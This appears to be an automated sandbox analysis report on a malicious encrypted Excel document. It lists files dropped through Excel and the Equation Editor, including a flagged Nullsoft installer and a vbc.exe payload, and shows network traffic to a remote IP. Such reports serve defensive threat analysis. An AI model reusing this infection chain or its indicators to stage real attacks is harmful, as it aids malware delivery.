      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ms-windows metafont .wmf
      Category:dropped
      Size (bytes):42946
      Entropy (8bit):6.468511009392856
      Encrypted:false
      SSDEEP:768:OJZh5jCwGHyqnu7QsrRQWZyLs9zuWOAAhOu9xeAjRGjO606QWGErZ6OMFd48jU7/:iPyedfZV9RO2kwy/lck94X4GT1
      MD5:F5131B0D4BE02F6DBFB64313921574AF
      SHA1:A8116CEC8B593BB4B30E7190A7897264BFFBDBBF
      SHA-256:5AF63109E000FA6F97D157AE1AA499C053762479BAD6FEFC3433C3554669AB11
      SHA-512:E0E0347B788592F7A90F8EA5B923FE578EF7270D962997E5DCB0E58EF4D4A259F8C9398E55F4D6CAE00A17FE426684A8DC408A567C5085AB938E59DBEDD22FB4
      Malicious:false
      Preview:...................rE.......S....F.....................9.R...................-...................".....-...........................".....-...........3.........-...............$.........................................-...............-.......-...........3.........-...............$.d.(.....q.......{.}.t.m.n.].h.P.b.C.\.8.W...R.%.L...F...@...9...2...*...".........x.....U.f.].:.C...:...O...`.u.m.W.w.:.|...|...y...r...f...V...B...)...................&...K...g...x...~...y...g...I.....N...h.....*...M...j.................o...R...0...................`...4.....S...&.........W.......<...<.V.E...D................./...V...{.........;...W...s.............................#.1.......(...(.......-...............-.......-...........D.........-...............$...(...&...$.$.".B...a...d...f...i...l...o...r...u...x...p.~.i.m.b.^.\.Q.V.D.O.9.I./.C.%.<...6.......'.............................................................~.....v...g...X...I.{.J.u.K.o.L.i.M.c.I.^.D.X.@.S.<.M.7.G.3.B./.<.+.0.+.#.,...,...-...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 150x150, frames 3
      Category:dropped
      Size (bytes):4422
      Entropy (8bit):7.85119455039558
      Encrypted:false
      SSDEEP:96:xtrSkbtlIH8DNo0d/xK0xPJEd+jmoOVKW1wVwUrhEmJzUcSZFMYrZvn:xt9taINo4pXxA9x1XUtEmUXFMo
      MD5:C96C0C48B8618E6C3900BA7A247F8CBA
      SHA1:F26FAC99A47B00164D9B57FB24904F9E29777229
      SHA-256:8F82582426E79EC967B238F609F485DAB0AB8C7C4CB14BF9B40050D33C42E782
      SHA-512:0CB9B7BC028A61CF4D2A06A735E45F9786DCC4D310F61E1D8A80E2F35D4D998BCF85CDD30998A1A903D329A90ACD819D678DF693106897ACE6B65EDFC0F7C968
      Malicious:false
      Preview:......JFIF...................................................!........'.."#%%%..),($+!$%$...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......................3................................................................PU.....l.)}..]..<.T.)...s<.)i-.:.....D\...D.y.ri<.........}..0d..x."h.9gWY...m..y....>}.w...s...p0|..OB.......@..p0T...$.B..a..L(.#.h..l.........M..#&K.`.S......$.L6 ...`.40]....K+MKB.....:@5=)......8..y....VO.........K@`.&.&...jd.d.....<.q.......... ...<....\.m]..pE0w7#.OB..........r..zP`.:..L. .2`.O.........................7............................S..2T !1Q.#5A.&3.$%6CDPRc............p.|.3......q..c.4....VHW..:{y...UK9d-|T_...]O..a........H..e(Z.c.`.. E..W..D.....\....t.O.r...=..U...pj...@E...+.+...W ..W1.....d..?L1R..S.V.V...J...u.Z....@......U*m...Y...._.d.......EDB..(*..D:......`.......3...&..../..W.HdaGm.[......gZF.7_/....{..../....n.6.+...=..H..N.....;...`I...`mk^.......................q.......W...~..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ms-windows metafont .wmf
      Category:dropped
      Size (bytes):42946
      Entropy (8bit):6.468511009392856
      Encrypted:false
      SSDEEP:768:OJZh5jCwGHyqnu7QsrRQWZyLs9zuWOAAhOu9xeAjRGjO606QWGErZ6OMFd48jU7/:iPyedfZV9RO2kwy/lck94X4GT1
      MD5:F5131B0D4BE02F6DBFB64313921574AF
      SHA1:A8116CEC8B593BB4B30E7190A7897264BFFBDBBF
      SHA-256:5AF63109E000FA6F97D157AE1AA499C053762479BAD6FEFC3433C3554669AB11
      SHA-512:E0E0347B788592F7A90F8EA5B923FE578EF7270D962997E5DCB0E58EF4D4A259F8C9398E55F4D6CAE00A17FE426684A8DC408A567C5085AB938E59DBEDD22FB4
      Malicious:false
      Preview:...................rE.......S....F.....................9.R...................-...................".....-...........................".....-...........3.........-...............$.........................................-...............-.......-...........3.........-...............$.d.(.....q.......{.}.t.m.n.].h.P.b.C.\.8.W...R.%.L...F...@...9...2...*...".........x.....U.f.].:.C...:...O...`.u.m.W.w.:.|...|...y...r...f...V...B...)...................&...K...g...x...~...y...g...I.....N...h.....*...M...j.................o...R...0...................`...4.....S...&.........W.......<...<.V.E...D................./...V...{.........;...W...s.............................#.1.......(...(.......-...............-.......-...........D.........-...............$...(...&...$.$.".B...a...d...f...i...l...o...r...u...x...p.~.i.m.b.^.\.Q.V.D.O.9.I./.C.%.<...6.......'.............................................................~.....v...g...X...I.{.J.u.K.o.L.i.M.c.I.^.D.X.@.S.<.M.7.G.3.B./.<.+.0.+.#.,...,...-...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):10202
      Entropy (8bit):7.870143202588524
      Encrypted:false
      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
      MD5:66EF10508ED9AE9871D59F267FBE15AA
      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
      Malicious:false
      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ms-windows metafont .wmf
      Category:dropped
      Size (bytes):8296
      Entropy (8bit):4.968794104149249
      Encrypted:false
      SSDEEP:192:1UD/eVx/xqAGlAoVo5kGtJvGOJsdHtf0jVTdfnnUj8GErUsRgvo/aRzutTkpNn8O:1UD/e3JqplAoVoeovGOadN8jVTdfnnsZ
      MD5:A549AA7F97898B261149683461DAA5B3
      SHA1:23FC6A9681D1EC42968FA9B7FDC3A39704D9A5A8
      SHA-256:0D8148A90146940BDEA33C016EF7472F2A2A98DC81B93642B3C0BE96F556CCDB
      SHA-512:8C341C222FCDBB3EC5E0FF672C2FF0B6947B297A587D5F6C5AA638691072F46B2F37627E3B9B5689F7A91203ADFE5069FE9ECC97C2AB6DCE9E69A22ADC121803
      Malicious:false
      Preview:....................R......)...........................C.....................-...................".....-...........................".....-.....................-...............$...V...............V.....................-...............-.......-.....................-...............$.n.........b...9.......................k...R...=...+.........}...v...u. ...:...Y...z.-...D...U..._...d.0.e.Q.c.p._...Y...S...N...J...H...H...H...H...I.....G...6...&.................{...`...E...>...7...0...)...(...&...#.............u...e...V...G...9...+.......................................................{...n...`...R...D...7...).......................d...I...2.....q...Y...>... ...................W...&...............................G.........-...............-.......-.....................-...............$..._.@...+...b._.@.....-...............-.......-.....................-...........B...$...&...%..."........./...B...T...e...u.........................q...\...Z...W...R...L...E...<.-.2.<.'.K.C...#...$...%...&...
      Process:C:\Users\Public\vbc.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):60648
      Entropy (8bit):6.273540391388373
      Encrypted:false
      SSDEEP:768:VyIscWONgNnXigWuv3uuCRCF5AElVllzCix92FBo/SlOKsVjiVsRb2X9bhM:VDt5Ngg23TgNElDNeo/8OLjiOR6
      MD5:00B917A158BB5BF0D6BFF7D6B3C81B12
      SHA1:24A9B80C8EC794ADA4C8BAF717CFAB98459AC1DE
      SHA-256:947BE059906893C09F222CB2868631638A219FB905A47E16A311BA5ADEB4B300
      SHA-512:47B8EABDF404E19B2D953933D2D0C922CC538B3876D7664110CBD739605FFD151D24788E60B9935E6E4F7BB463F6BC7CED253CF31ED5C4D210495C301C7E5F45
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........P..K1.K1.K1.BIX.G1..Y.I1....J1..Y.D1..Y.C1..Y.H1.BIO.J1.BIH.J1.8S.N1.K1..1..X.H1..X.J1..X4.J1.K1\.J1..X.J1.RichK1.................PE..d....5;a.........." .........j...............................................0...... .....`.........................................`...................H.................... ..4.......p............................................... ............................text............................... ..`.rdata.. -..........................@..@.data...`'..........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..4.... ......................@..B................................................................................................................................................................................................................
      Process:C:\Users\Public\vbc.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):36576
      Entropy (8bit):6.18658407883376
      Encrypted:false
      SSDEEP:384:Vw33667/fhcAcwuVQydIDddeypaROhGkXMV3lBhjUK98krmRt8ZrqL1r8/lSNriq:q33oWsUK98vAqL1r8oFiQ7b2X9shHf
      MD5:0B849C073801DCE25301ECA0146D534B
      SHA1:5BB9251CA83FE96C8F52B35637E674A629ED1468
      SHA-256:3F77E9EF8843DE3DA37037F21BCF6D7E990085D2BDC5B3F05E71AB5EBE5288BB
      SHA-512:1C5C99BD93FBACD3BA56ADE806092AB86BA3FEA0BB70DE0FB89775285A71DB47F2400CF29757370CDC69F13FCBCF6513B25F4C8BBED0A15D65A9618BEE733A7F
      Malicious:false
      Antivirus:
      • Antivirus: Metadefender, Detection: 0%, Browse
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.%.>.v.>.v.>.v.FNv.>.v.\.w.>.v.V.w.>.v.V.w.>.v.V.w.>.v.V.w.>.v.`.w.>.v.>.v.>.v!W.w.>.v!W.w.>.v!W"v.>.v.>Jv.>.v!W.w.>.vRich.>.v........................PE..d......a.........." .....>...\.......@.................................................... .........................................pd..l....d.......................p..........H....T..p...........................`U...............P...............................text....<.......>.................. ..`.rdata.......P.......B..............@..@.data...0....p.......`..............@....pdata...............b..............@..@.rsrc................h..............@..@.reloc..H............n..............@..B........................................................................................................................................................................................................................
      Process:C:\Users\Public\vbc.exe
      File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):1070
      Entropy (8bit):4.836891219007383
      Encrypted:false
      SSDEEP:24:JdtGOiNK+bIg4y3QdM/Ai8qTCNzgDQRnKVGaQkl:3U1K+bIg4y3QdaIzgDQh3aQkl
      MD5:9B48061E7B9FC35CD2624F2B9102549E
      SHA1:9DA640A8AF809549031916AB143026FAAF3B1E74
      SHA-256:84839C6E85F9B73AA6B0F331A9EAADF7409B7B36E30BA0B04E31680069103E43
      SHA-512:01CF7B5CBDEB1038E79076CB452AC63B0037C86570C3FE97B6C559823F43D515F34CAC963D3737B9EAF103F0EBDEBC1317B68091D4332C3615E87A3F25DF679E
      Malicious:false
      Preview:.<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" />.. </dependentAssembly>.. </dependency>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="NeGACOM" type="win32" version="17.0.0.0" processorArchitecture="x86" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="OnlineServices" version="17.0.0
      Process:C:\Users\Public\vbc.exe
      File Type:data
      Category:dropped
      Size (bytes):77857
      Entropy (8bit):6.547993029150311
      Encrypted:false
      SSDEEP:768:AFqdbR9DKlYLUnKhy9ZSLJFv8qsCCgMCz7rQ4mr9wVptTQuzwQTurevVEyTCsQg6:UnKhy9K0Xx9wHtTZtPVHZDanWIogL
      MD5:B021F3197225409A4EC77E8ED259532E
      SHA1:B9B2356B156F047E578910BB77995013E633B28E
      SHA-256:749CCBEA3A290F99C225992CFFBEFECC11E47B1A50208F8D2D1EFDBF45F9C4F2
      SHA-512:248528B3D2986B88FA0F9D43AB8E9E6109FE115D05145B001913EF884678CD557B3C246E6299C844A355570D8650845DD2A42D98EBC994BDB2EC7E653AD5399F
      Malicious:false
      Preview:....f.r.m.g.....C.....}.w.F.G:.vh.....TX...l....3....~.L*M.g.n..e.o...k.s..U...C...?S..m.)..+.Qa...Iy`.>..\@......{.4tp...1|W...!...;...V..._f.....f.v.......b.VP....#....z._8$^..d'V.AK.Ni.].%( 8......"0...Z..r..YH.6..9c.,.&..t.-.i..7l.u..Kqx.....<[..J25-E..@...a/=.....R..O"f.DC.....}.w.F.G:.vh...f.............TX...l....3....~.L*M.g.n..e.o...k.s..U...C...?S..m.)..+.Qa...Iy`.>..\@......{.4tp...1|W...!...;..b.VP....#....z._8$^..d'V.AK.Ni.].%( 1.f.j..............."0...Z..r..YH.6..9c.,.&..t.-.i..7l.u..Kqx.....<[..J25-E..@...a/=.....R..O"f.DC.....}.w.F.G:.vh.....TX...l....3....~f.....f.......L*M.g.n..e.o...k.s..U...C...?S..m.)..+.Qa...Iy`.>..\@......{.4tp...1|W...!...;..b.VP....#....z._8$^..d'V.AK.Ni.].%( 8......"0....4.."........u.......r..YH.6..9c.,.&..t.-.i..7l.u..Kqx.....<[..J25-E..@...a/=.....R..O"f.DC.....}.w.F.G:.vh.....TX...l....3....~.L*M.g.n..e.o...k...................U...C...?S..m.)..+.Qa...Iy`.>..\@......{.4tp...
      Process:C:\Users\Public\vbc.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):288
      Entropy (8bit):7.002703251110111
      Encrypted:false
      SSDEEP:6:6v/lhPysDjYOGW78zHS1w9xuIGXdvkFRBp9rXHEb/GY1IX2NYKjp:6v/7jjYOGW7Rw9xu6pxHG/VIX6F
      MD5:A83F8C904AFA9E3F6A50D263747CF6DF
      SHA1:7B9D99B950518FCAF5AC59350823D2B20E82956F
      SHA-256:F57C0B31EC836E26EB609F259CFA68DDA95F09685784423B61075DAE4BBA5BF6
      SHA-512:4B2DC243E86514BDC816B92808C491EF71B72690F25C2372FE909CED3A103F990708C507065169FA5C6F823A8B1ADADB7BF13696E78C807A973789CF14CA3A06
      Malicious:false
      Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...N.Q...'.....X.s.^../H.f.....BJ....V[.b..qsvA..d..y.9?...z.`./....'..[.Q..'...M.....mwuN.\....h..(|........p.K..I.%..... ..*..x.t~.kW.`V'.8.W.K.l.4..9.&\..k..3F........4.0.op.rL#.....N:.=.T.[....L.....p...#....IEND.B`.
      Process:C:\Users\Public\vbc.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):893
      Entropy (8bit):7.712327619290152
      Encrypted:false
      SSDEEP:12:6v/7M/6CsI5hmePcdiB6BV3h8SkKc47zOTtcC8VErf6qdY94OR/vlNMgmaGe7fb:q65hBcs6L3h6hBcCLrDq42nMDanb
      MD5:473EE416AF2C1AE05AA7D5D004C9B3D2
      SHA1:EEC352E25F562C0386D5C92384A70B3005D40D6F
      SHA-256:2C48F1719BBC825592FB0929E31DCFE66578665D28099087EA98EF261688DC18
      SHA-512:2B05C9920CFDCF378448F35B14AA56078051584CA0DB15F43B5A27272B072DD8A76BBC2829DF4C7C7BAF8339839974A00CA7BFFB8425B7D9494421CCC9EE80C1
      Malicious:false
      Preview:.PNG........IHDR................a...DIDATx.e.C..H.F_..tzl{m.m.m.m..;=F+..j.......r.........hZ...%Sn...Z....|g...o.c..f..k..#.Y.5..2...r44.t...[|.EW....E..3v....o...n...y.V.%.\g.].XY.).PQ..h~.Mu.:I.~.!{dt...-....c........~.ihs..<.23h.q...AA....P.O.d.#....S%....w....~(.Yg.mL.`..r.U?A.D......%.t..~.b..wl...G\r.......,^m.b%..??...?./........O..w\|..t..5...^x....cK..?..b...3^#i.xYp3.>..C<Q.yg^.3.=..;./..!.`.....dq%...`..wB....q.2....W....S`....E....q3.A....9...."..].+.f...-.Z)d*..h..O>......c>...=.P..!...pw}g..t&.=..Dd...i.f......\....-JO0hW....!.ic.%...s.+...iG|..MK...O_..;_.q_....|...F....M...O...o..5.=...y{...]hn..Z..L+..`r.&I...5t._Dz..m.~$n$..|.u}_.n|.53..b.+Zn.bCA.1..x..hv?.{8...!\J......>OukN..{...[#.....7....k..L.#...D.y:K5.|.&..XV.U..rb..T..G..6.I...~.....i.#ike...9/B_&.....^v]..._.l.Et.i..M..l.B1...A.....>._...P.,... ....IEND.B`.
      Process:C:\Users\Public\vbc.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):12288
      Entropy (8bit):5.814115788739565
      Encrypted:false
      SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
      MD5:CFF85C549D536F651D4FB8387F1976F2
      SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
      SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
      SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
      Malicious:false
      Antivirus:
      • Antivirus: Metadefender, Detection: 0%, Browse
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Users\Public\vbc.exe
      File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
      Category:dropped
      Size (bytes):214568
      Entropy (8bit):6.30310219025288
      Encrypted:false
      SSDEEP:3072:WSQvJRT4XDaGZcJRQqnKJNuC3d5C/I4ye9P7Vvw/YDQzix+AKp:WDRT4XDpZ0QqnKJNuCwx9PRCixK
      MD5:6D01A897D44DD4D25D7E1264407210FD
      SHA1:332C3ADE84D0C1E5BE298C037F9FE222620343B2
      SHA-256:DD8289A21902F458B861C08A2F54D23F1E214B37BB89E73D4108303B490F7644
      SHA-512:54098533FDC9B4BAB0CD525D652846B5CDCD808089346D0192D7CF9DE6C1E8E329E2071886391D729F3DFED59D2E860E8A811E07E6688E6AA0B55D5D98D1AD8D
      Malicious:false
      Antivirus:
      • Antivirus: Metadefender, Detection: 0%, Browse
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...#.B..........P..........d....................................2.....`... ......................................P.......`......................."..($..................................@...(....................c..8............................text....A.......B..................`.P`.data........`.......F..............@.`..rdata..\....p.......H..............@.`@.pdata..............................@.0@.xdata....... ......................@.0@.bss.........@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....X...........................@.@..tls................................@.@..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:CDFV2 Encrypted
      Category:dropped
      Size (bytes):213672
      Entropy (8bit):7.964607650021662
      Encrypted:false
      SSDEEP:6144:xnD5YU5hM5XL23iiQ5fw+d6vUCbEGp/t3Yoq6:xn1Hq5X63i/XGp/Lq6
      MD5:06F4851CBDC105CC140818B42F000B0E
      SHA1:40AC7C31FD3E2F3524BD82200491741F02F9A1EF
      SHA-256:3844F8A2B3657D0141D505373F74BEB01B6C2150C6931670BC241D600DCA89EB
      SHA-512:6454EACA3808487453945EADE52A08FA09083CCF2D2F96EC1EBB7B366EC251000057E21FBB64640B1F326D0DD243CE0D17EC3E4DBB6F0D5C578051503C867761
      Malicious:false
      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):165
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
      MD5:797869BB881CFBCDAC2064F92B26E46F
      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
      Malicious:true
      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:dropped
      Size (bytes):334840
      Entropy (8bit):7.5515570562738015
      Encrypted:false
      SSDEEP:6144:03yztyL/0/bbdat6J9mOnuuogo+aBhAYpAhX0vsMfwUrJrnBpKussJ9LQs3:03pL0/bbdat6JIO1RgBhAY4cPf3BnB3Z
      MD5:78003B1DD8F6229A23A13087082E259C
      SHA1:8A9998FEAE97C83883C682457E06E01A5F49C28A
      SHA-256:784D3F82BACA5B823EE950DF8A640E1D5A1C1EE75B78A3C26ABDA15A99A204F3
      SHA-512:36DE0D01ADAC20F81A5A9B1248239723CD77D93A60F12487E99F3DE7981ACB91CBD780F0D78705862882996A60057D3FCD3BEC3929718E72A6201795382CA6F0
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 15%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:......5............@...........................>...........@..........................................`=..Y..............0 ...........................................................................................text...pf.......h.................. ..`.rdata...............l..............@..@.data...x.9.........................@....ndata........:..........................rsrc....Y...`=..Z..................@..@................................................................................................................................................................................................................................................................................................................................................
      File type:CDFV2 Encrypted
      Entropy (8bit):7.964607650021662
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:OR17233976_00019489_20170619154218.xlsx
      File size:213672
      MD5:06f4851cbdc105cc140818b42f000b0e
      SHA1:40ac7c31fd3e2f3524bd82200491741f02f9a1ef
      SHA256:3844f8a2b3657d0141d505373f74beb01b6c2150c6931670bc241d600dca89eb
      SHA512:6454eaca3808487453945eade52a08fa09083ccf2d2f96ec1ebb7b366ec251000057e21fbb64640b1f326d0dd243ce0d17ec3e4dbb6f0d5c578051503c867761
      SSDEEP:6144:xnD5YU5hM5XL23iiQ5fw+d6vUCbEGp/t3Yoq6:xn1Hq5X63i/XGp/Lq6
      TLSH:9824027774380AD7F087FB3274C050488B41FDD7A2B0BB96591A35192AFDD0D8BA8E96
      File Content Preview:........................>......................................................................................................................................................................................................................................
      Icon Hash:e4e2aa8aa4b4bcb4
      TimestampSource PortDest PortSource IPDest IP
      May 10, 2022 22:16:58.423713923 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:58.652683020 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:58.652841091 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:58.655296087 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:58.885287046 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:58.885374069 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:58.885457039 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:58.885499001 CEST8049173103.149.13.182192.168.2.22
      May 10, 2022 22:16:58.885519028 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:58.885691881 CEST4917380192.168.2.22103.149.13.182
      May 10, 2022 22:16:59.114145994 CEST8049173103.149.13.182192.168.2.22
